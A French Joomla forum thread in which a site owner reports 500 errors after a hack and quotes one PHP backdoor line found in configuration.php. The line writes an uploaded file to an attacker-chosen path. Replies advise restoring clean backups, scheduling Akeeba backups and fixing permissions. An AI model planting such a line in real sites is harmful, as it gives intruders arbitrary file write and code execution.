Possible piratage Joomla 3.4.8

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] Possible piratage Joomla 3.4.8

    Bonjour à tous !

    Depuis quelques jours et sans raison apparente, un de mes sites Joomla affiche une erreur 500 à chaque inscription ou reset du mot de passe ou de l'identifiant.

    Pas de souci pour la connexion.

    En front, lors d'une tentative d'inscription, erreur 500 et pas d'inscription.
    En back, lors d'une tentative d'inscription, erreur 500 mais l'inscription est prise en compte.

    Lors d'un reset de mot de passe ou d'identifiant, si c'est fait à partir de l'email d'un utilisateur lamda, erreur 500 mais l'utilisateur est bien désactivé (quand je vais voir en back).
    Il restera désactivé puisque l'erreur 500 l'empêche de finaliser la ré-initialisation.

    Lors d'un reset de mot de passe ou d'identifiant, si je m'amuse à tester avec une adresse email inexistante, j'ai bien le message d'erreur qui va bien.

    Si j'essaie avec l'email du super-utilisateur, là encore, j'ai bien un autre message d'erreur correct.

    C'est bizarre, il y a encore 5 jours un utilisateur s'est correctement inscrit en front. Depuis mon site n'a subi aucun changement, pas de MAJ, rien.

    Mon hébergeur a des voyants qui clignotent assez vite généralement, quand nous subissons des attaques (site institutionnel...). Mais rien de son coté pour l'instant.

    Mais je crains très fortement d'avoir été attaqué, car grâce aux logs de mon hébergeur (pas les logs Joomla) j'ai retrouvé tout en haut du fichier configuration.php, juste avant la "class Jconfig", cette ligne là :

    Code:
    if ($_FILES['F1l3']) {move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']); echo 'OK'; Exit;}
    Depuis que je l'ai supprimée, j'ai l'impression d'un léger mieux (le "détail" des erreurs 500 mentionne de belles URL, et pas les "...itemid..."), mais ça ne corrige pas le problème.

    Et les logs sont aveugles pour l'instant.

    Please qu'en pensez-vous ? C'est la panique à bord ici !!!! J'ai des PJ privées, des RIB, bref c'est chaud !

    Joomla 3.4.8
    PHP 5.5.12
    Certes je redirige le formulaire d'inscription avec le CCK Fabrik, mais dans les règles de l'art, je ne pense pas que l'extension soit responsable.

    Merci d'avance pour le moindre conseil, REX ou avis !

  • #2
    Re : Possible piratage Joomla 3.4.8

    Bonjour

    Le code que tu as posté ne laisse aucune doute sur la question : ton site a été hacké.

    Si tu as un backup récent et sain, c'est la meilleure chose à faire : remonter une version propre du site.

    Bonne chasse aux virus.
    Christophe (cavo789)
    Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
    Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

    Commentaire


    • #3
      Re : Possible piratage Joomla 3.4.8

      Bonsoir,
      Et surtout, il faut que tu arrives à comprendre où son passé les hackeurs... sinon, ils vont juste recommencer par la même "porte".
      Chabi01 - http://www.xlformation.com

      Commentaire


      • #4
        Re : Possible piratage Joomla 3.4.8

        OK merci, j'ai des backups mais est-ce vraiment la seule solution ?

        Mon dossier tmp était de plein de fichier "ca_dompdf...".

        Commentaire


        • #5
          Re : Possible piratage Joomla 3.4.8

          La solution à quoi George ? Si ton site est hacké et si ton backup est sain, oui c'est la solution. Restera ensuite à sécuriser le site.

          Si ton backup est déjà contaminé, il te faudra nettoyer le site.
          Christophe (cavo789)
          Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
          Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

          Commentaire


          • #6
            Re : Possible piratage Joomla 3.4.8

            En fait je préfèrerai nettoyer le site, afin ne pas perdre les modifications apparues entre-temps.

            Je vois que vous avez un outil à cette fin, je vais m'y intéresser, mais si vous avez des conseils avant, je suis preneur !!!

            Commentaire


            • #7
              Re : Possible piratage Joomla 3.4.8

              L'outil QuickScan, gratuit, est un outil dont l'objectif est de détecter une partie des virus. C'est un ... QuickScan, pas un DeepScan J'ai ce dernier outil mais je le garde pour mes prestations de nettoyage; il n'est pas téléchargeable.

              Tu auras aussi vu dans ma signature le troisième lien pour obtenir des conseils sur une méthodologie de nettoyage.

              Bonne soirée.
              Christophe (cavo789)
              Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
              Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

              Commentaire


              • #8
                Re : Possible piratage Joomla 3.4.8

                OK merci !

                Encore une question, à votre avis, pour ce type de piratage, le malfaiteur est-il parvenu à accéder au SFTP. C'est-à-dire directement aux fichiers ?

                Ou alors a-t-il simplement réussi à "injecter" ce code ?

                Commentaire


                • #9
                  Re : Possible piratage Joomla 3.4.8

                  Personne ne saura te répondre; personne ne sait comment et où il est passé sur base de cette seule discussion.

                  En principe, il est passé par le web, en accès URL.

                  Si maintenant tu es sur un serveur défaillant / un mauvais hébergeur, on pourrait imaginer que ce soit un autre site que le tien, sur le même serveur, qui t'a contaminé. Quasi improbable mais si tu es chez un hébergeur médiocre; oui, théoriquement possible.

                  Pour ton FTP, si tu as laissé trainer les codes d'accès (je te charrie), oui, possible aussi.

                  Il faudra étudier ton log apache pour commencer à avoir un début de réponse.
                  Christophe (cavo789)
                  Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                  Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                  Commentaire


                  • #10
                    Re : Possible piratage Joomla 3.4.8

                    En fait je préfèrerai nettoyer le site, afin ne pas perdre les modifications apparues entre-temps.
                    Une petite astuce qui permet d'éviter de se retrouver sans sa dernière sauvegarde, cela pourra sans doute servir à plusieurs.
                    Akeeba backup sert pour les backups.
                    On peut donc sauvegarder fichiers et/ou base de données.
                    Le truc, c'est que même en y pensant souvent, il peut arriver que l'on zappe des backups.
                    Pour éviter cela, il faut simplement les "programmer". Base de données tous les jours et fichiers 1 fois par semaine.
                    Pour certains sites ecommerce, je mets également en place les backups de base 4 fois par jour.

                    Comment faire ?
                    Akeeba permet de créer des profils.
                    Il faut donc en créer 2 : un pour tout le site et le 2e juste pour la base.
                    Quand ces profiles sont créés, les hébergements permettent normalement de lancer des taches "cron" à intervalle régulier.
                    Dans Akeeba, il y a un bouton "Scheduling information". Ce bouton ouvre une page avec la ligne de commande à ajouter au cron. Il suffit alors dans son hébergement de donner une heure pour le backup et comme cela, c'est automatisé.
                    Chaque profile peut être lancé en ajoutant "-profile=numéro_du_profil".

                    Où mettre les backups ?
                    Pas sur le même serveur ! Cela est illogique.
                    Tout le monde connait Dropbox, non ? 2 Go gratuitement (il y en a d'autres bien sur).
                    Directement dans Akeeba, quand vous avez votre profil, vous avez un champ "post traitement" dans "Configuration". Ici, il suffit de sélectionner Dropbox (V1 est très simple à paramétrer), cliquer sur "Autorisation Etape 1", valider en cliquant sur le bouton l'accès à votre dropbox, cliquer ensuite sur "Autorisation Etape 2" pour qu'il recopie les clés automatiquement et enfin déterminer un dossier dans Drobpox pour ranger les sauvegardes (pas besoin de le créer sur Dropbox, ils seront automatiquement créés si il n'existe pas).

                    A partir de là, il n'y a plus à s'occuper de rien et les backups sont fait simplement et automatiquement et seront directement exploitables depuis l'interface de Akeeba Backup (depuis "Restore backup") en cas de souci.

                    Cela évite beaucoup de temps de perdu au prix de 10 minutes de paramétrages..

                    Sans sauvegarde récente, en "nettoyant" le site, il y a toujours une chance de ne pas trouver une chaine injectée dans un fichier ou un fichier ajouté dans les centaines de dossiers existants...

                    Cordialement,
                    Chabi01 - http://www.xlformation.com

                    Commentaire


                    • #11
                      Re : Possible piratage Joomla 3.4.8

                      Envoyé par Georgie! Voir le message
                      En fait je préfèrerai nettoyer le site, afin ne pas perdre les modifications apparues entre-temps.

                      Je vois que vous avez un outil à cette fin, je vais m'y intéresser, mais si vous avez des conseils avant, je suis preneur !!!
                      D'où l'intérêt de toujours développer le site en local pour avoir une copie exacte du site. En cas de problème sur le site en ligne, c'est beaucoup plus simple.

                      Commentaire


                      • #12
                        Re : Possible piratage Joomla 3.4.8

                        Envoyé par domallia Voir le message
                        D'où l'intérêt de toujours développer le site en local pour avoir une copie exacte du site. En cas de problème sur le site en ligne, c'est beaucoup plus simple.
                        Pas d'accord ! Si le site doit être développé en local et remis en ligne à chaque modification, autant alors faire un site statique ; on perd tout l’intérêt du CMS, et, de plus, on interdit toute interaction avec les visiteurs : impossible d'ajouter des membres, de gérer un forum, de permettre aux membres de proposer du contenu... toutes choses qui se passent directement en ligne.

                        La seule solution est, comme déjà dit, la sauvegarde régulière du site, avec Akeeba backup pour l'ensemble fichiers-base, avec LazyDbBackup en complément pour ce qui est de la base de données, en ce qui me concerne.
                        "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
                        MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

                        Commentaire


                        • #13
                          Re : Possible piratage Joomla 3.4.8

                          Bonjour à tous

                          Merci de tous vos conseils liens et expériences !

                          Je me suis finalement contenté de restaurer un backup Akeeba sain, fichier et DB. Ensuite j'ai évalué les modifications éventuelles apparues entre-temps, et, afin de récupérer les modifs apparues entre-temps, j'ai fait des copier-remplacer de certaines tables du site contaminé (les tables "content...", "user" et de certaines tables de contenus hors Joomla).

                          Les symptômes connus du piratage ont complètement disparues.

                          J'avais quelques extensions non-à-jour, mais rien de crucial ou alors rien de trop ancien.

                          En revanche j'ai remarqué que mon répertoire principal (htdoc) avait des CHMOD à 775. Qu'en pensez-vous ?

                          Il est possible que ça soit moi qui les ai mis il y a longtemps, sans les retoucher depuis.

                          J'ai passé les CHMOD de mon htdoc à "755, répercussions sur les sous-dossiers uniquement" (avec Filezilla).
                          Cela semble aussi avoir mis les CHMOD des fichiers à 644.

                          Ça m'a l'air OK, mais qu'en pensez-vous ?

                          Des conseils ou habitudes par rapport à cela (éternelle question... désolé).

                          Commentaire


                          • #14
                            Re : Possible piratage Joomla 3.4.8

                            Envoyé par RobertG Voir le message
                            Pas d'accord ! Si le site doit être développé en local et remis en ligne à chaque modification, autant alors faire un site statique ; on perd tout l’intérêt du CMS, et, de plus, on interdit toute interaction avec les visiteurs : impossible d'ajouter des membres, de gérer un forum, de permettre aux membres de proposer du contenu... toutes choses qui se passent directement en ligne.

                            La seule solution est, comme déjà dit, la sauvegarde régulière du site, avec Akeeba backup pour l'ensemble fichiers-base, avec LazyDbBackup en complément pour ce qui est de la base de données, en ce qui me concerne.
                            Je ne vois pas où est le problème. En cas de hack, et uniquement dans ce cas ça permet de transférer rapidement les fichiers sur le serveur distant. Je ne vois pas en quoi avoir une copie en local empêche l'interaction avec les visiteurs sur le site en ligne.
                            Il est question des fichiers, pas du contenu de la BD.
                            Akeeba, c'est très bien mais si la sauvegarde est vérolée...
                            Chacun fait comme il vaut.

                            Commentaire


                            • #15
                              Re : Possible piratage Joomla 3.4.8

                              Bonjour j'ai bien peur d'avoir un problème dans le même genre avec un fichier tout à fait étrange nommé justement "strange.php".

                              J'ai découvert cette présence grâce à Avast à l'occasion d'une sauvegarde du site sur l'un de mes disques dur par transfert FTP.
                              Il était logé dans le sous dossier /libraries/joomla/access

                              En voici le contenu
                              Cliquez sur l'image pour l'afficher en taille normale

Nom : scree_of_strange_php.jpg 
Affichages : 1 
Taille : 155,7 Ko 
ID : 1805416

                              Site : php version : 4.2.12
                              Type de serveur : MySQL
                              Version du serveur : 5.5.47

                              j'utilise la dernière version 3. quelqueque chose de Joomla. Le probleme nouveau est que j'ai modifié le nom du fichier et changé le MDP FTP et que je ne parviens plus à entrer en administrateur pour donner le N) de version !!!

                              Commentaire

                              Annonce

                              Réduire
                              Aucune annonce pour le moment.

                              Partenaire de l'association

                              Réduire

                              Hébergeur Web PlanetHoster
                              Travaille ...
                              X